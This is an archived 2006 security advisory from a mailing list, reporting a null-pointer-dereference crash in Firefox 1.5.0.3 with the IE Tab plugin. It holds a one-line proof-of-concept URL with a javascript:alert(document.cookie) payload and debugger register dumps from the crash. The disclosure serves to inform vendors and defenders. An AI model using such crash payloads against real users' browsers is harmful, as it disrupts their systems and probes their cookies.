lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <446b702e.4d846024.4993.221a@mx.gmail.com>
Date: Wed May 17 19:49:28 2006
From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty)
Subject: Firefox (with IETab Plugin) Null Pointer
	Dereferences Bug 

Firefox (with IETab Plugin) Null Pointer Dereferences Bug 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vendor: Mozilla
Product: FireFox with IE Tab 

Tested On: 
FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)

Introduction: 
IETab (https://addons.mozilla.org/firefox/1419/) is a recently released
(April 12, 2006) plugin for Firefox. It is used to browse IE (only) specific
sites under Firefox. Guess what ?? You can run windowsupdate under FireFox
;-)

Bug Details: 	
Firefox with the IETab installed crashes when ietab plugin is unable to
handle specific javascripts. It seems to be a null pointer dereference bug.
For more details refer the PoC section. 

Proof-of-Concept:
Copy & paste the following URL to the Firefox addressbar and press enter - 

chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);

Note: This test will not work if IETab is not installed.

The Registers details after the crash: 

(1e4.3e0): Access violation - code c0000005 (first chance) First chance
exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00010246

npietab!NP_GetEntryPoints+0xb8ac:

0192e7dc 668b10           mov     dx,[eax]
ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]
ds:0023:00000000=????



For more vulnerabilities : http://hackingspirits.com/vuln-rnd/vuln-rnd.html


Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ